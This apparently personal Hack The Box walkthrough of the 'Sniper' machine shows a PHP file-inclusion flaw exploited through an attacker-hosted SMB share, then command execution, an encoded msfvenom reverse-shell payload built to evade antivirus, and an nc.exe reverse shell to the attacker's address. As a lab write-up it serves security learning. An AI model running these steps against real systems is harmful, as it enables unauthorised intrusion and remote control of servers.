4 :80 /blog > LFI > smbRFI

http://sniper.htb/blog/?lang=blog-fr.php
# maybe LFI / RFI?

# tested using http://sniper.htb/blog/index.php?lang=header.html
| relative path to reach ..\user\db.php returns error,
| we need absolute path?

Trying C:\Windows\System32\Drivers\etc\hosts
| as its running php
view-source:http://sniper.htb/blog/index.php?lang=/Windows/win.ini
| shows file

</html>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</body>
</html>

# RFI fails
http://sniper.htb/blog/index.php?lang=http://10.10.16.7/kashz
# no callback

# trying SMB share reads, as SMB share is considered on the network
http://sniper.htb/blog/index.php?lang=//10.10.16.7/kashz

$ smbserver.py -smb2support drive .                                                                                                                                                                                                   130 ⨯
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49765)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found KASHZ
[-] SMB2_TREE_CONNECT not found KASHZ

# we get callback

# testing simple info.php
$ cat info.php                                                                                                                                                                                                                        130 ⨯
<?php
phpinfo();
?> 

http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/info.php
| we get phpinfo
System 	Windows NT SNIPER 10.0 build 17763 (Windows Server 2016) i586
Architecture 	x86 
Loaded Configuration File 	C:\Program Files (x86)\PHP\v7.3\php.ini
disable_functions	no value
$_SERVER['USERDOMAIN']	WORKGROUP
$_SERVER['USERNAME']	SNIPER$
$_SERVER['SCRIPT_FILENAME']	C:\inetpub\wwwroot\blog\index.php

# no value for disable_functions allows us to execute commands
# putting web.php
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/web.php

CMD: whoami && whoami /priv && systeminfo
nt authority\iusr

PRIVILEGES INFORMATION
----------------------
Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

Host Name:                 SNIPER
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Hotfix(s):                 N/A

# don't have write perms at C:\inetpub\wwwroot\blog or C:\users\public\
# tried running nishang shell, PS cannot seem to run it?
# tried coping msfvenom to C:\windows\temp
| Operation did not complete successfully because the file contains a virus or potentially unwanted software.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=445 -f exe -o kashz.exe -e "x86/shikata_ga_nai"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 487 (iteration=0)
x86/shikata_ga_nai chosen with final size 487
Payload size: 487 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe

CMD: copy \\10.10.16.7\drive\kashz.exe C:\windows\temp\kashz.exe
        1 file(s) copied.
# shell wont execute, tried 445, 49667 port - no callback

# via nc.exe
copy \\10.10.16.7\drive\nc.exe C:\windows\temp\nc.exe
C:\windows\temp\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969

$ nc -lvnp 6969                                                                                                                                                                                                                       130 ⨯
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.151] 49831
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>

Last updated